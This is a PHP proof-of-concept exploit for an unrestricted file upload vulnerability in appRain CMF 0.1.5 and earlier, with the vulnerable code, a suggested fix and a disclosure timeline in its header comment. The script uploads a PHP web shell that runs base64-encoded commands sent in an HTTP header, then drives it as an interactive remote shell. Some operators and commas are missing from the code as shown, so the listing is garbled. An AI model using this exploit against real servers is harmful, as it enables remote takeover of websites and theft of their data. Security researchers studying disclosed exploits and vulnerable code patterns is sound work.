appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit



<?php



/*

    ---------------------------------------------------------------------

    appRain CMF <= 0.1.5 (uploadify.php) Unrestricted File Upload Exploit

    ---------------------------------------------------------------------

    

    author............: Egidio Romano aka EgiX

    mail..............: n0b0d13s[at]gmail[dot]com

    software link.....: http://www.apprain.com/

     

    +-------------------------------------------------------------------------+

    | This proof of concept code was written for educational purpose only.    |

    | Use it at your own risk. Author will be not responsible for any damage. |

    +-------------------------------------------------------------------------+

    

    [-] vulnerable code in /webroot/addons/uploadify/uploadify.php

    

    27.    if (!empty($_FILES)) {

    28.            $tempFile = $_FILES['Filedata']['tmp_name'];

    29.            //$targetPath = $_SERVER['DOCUMENT_ROOT'] . $_REQUEST['folder'] . '/';

    30.            $targetFile =  "uploads/" . $_FILES['Filedata']['name'];

    31.            

    32.            // $fileTypes  = str_replace('*.','',$_REQUEST['fileext']);

    33.            // $fileTypes  = str_replace(';','|',$fileTypes);

    34.            // $typesArray = split('\|',$fileTypes);

    35.            // $fileParts  = pathinfo($_FILES['Filedata']['name']);

    36.            

    37.            // if (in_array($fileParts['extension'],$typesArray)) {

    38.                    // Uncomment the following line if you want to make the directory if it doesn't exist

    39.                    // mkdir(str_replace('//','/',$targetPath), 0755, true);

    40.                    

    41.                    move_uploaded_file($tempFile,$targetFile);

    42.                    echo str_replace($_SERVER['DOCUMENT_ROOT'],'',$targetFile);

    43.            // } else {

    44.            //      echo 'Invalid file type.';

    45.            // }

    46.    }

    

    Restricted access to  this script isn't properly realized,  so an attacker might  be able to upload

    arbitrary files containing malicious PHP code due to uploaded file extension isn't properly checked.

    

    [-] Possible bug fix:

    

    include_once('../../../app.php');

    App::__Obj('appRain_Base_Core')->check_admin_login(); 

    

    add this lines of code at the beginning of the script

    

    [-] Disclosure timeline:

    

    [19/12/2011] - Vulnerability discovered

    [19/12/2011] - Issue reported to http://www.apprain.com/ticket/1135

    [20/12/2011] - Vendor response and fix suggested 

    [16/01/2012] - After four weeks still no fix released

    [19/01/2012] - Public disclosure

    

*/



error_reporting(0);

set_time_limit(0);

ini_set("default_socket_timeout"5);



function http_send($host$packet)

{

    if (!($sock fsockopen($host80)))

        die("\n[-] No response from {$host}:80\n");

 

    fputs($sock$packet);

    return stream_get_contents($sock);

}



print "\n+---------------------------------------------------------------+";

print "\n| appRain CMF <= 0.1.5 Unrestricted File Upload Exploit by EgiX |";

print "\n+---------------------------------------------------------------+\n";

 

if ($argc 3)

{

    print "\nUsage......: php $argv[0] <host> <path>\n";

    print "\nExample....: php $argv[0] localhost /";

    print "\nExample....: php $argv[0] localhost /apprain-v015/\n";

    die();

}



$host $argv[1];

$path $argv[2];



$payload  "--o0oOo0o\r\n";

$payload .= "Content-Disposition: form-data; name=\"Filedata\"; filename=\"sh.php\"\r\n\r\n";

$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";

$payload .= "--o0oOo0o--\r\n";



$packet  "POST {$path}addons/uploadify/uploadify.php HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Content-Length: ".strlen($payload)."\r\n";

$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";

$packet .= "Connection: close\r\n\r\n{$payload}";

    

if (!preg_match('/sh.php/'http_send($host$packet))) die("\n[-] Upload failed!\n");



$packet  "GET {$path}addons/uploadify/uploads/sh.php HTTP/1.0\r\n";

$packet .= "Host: {$host}\r\n";

$packet .= "Cmd: %s\r\n";

$packet .= "Connection: close\r\n\r\n";

    

while(1)

{

    print "\napprain-shell# ";

    if (($cmd trim(fgets(STDIN))) == "exit") break;

    $response http_send($hostsprintf($packetbase64_encode($cmd)));

    preg_match('/___(.*)/s'$response$m) ? print $m[1] : die("\n[-] Exploit failed!\n");

}



?>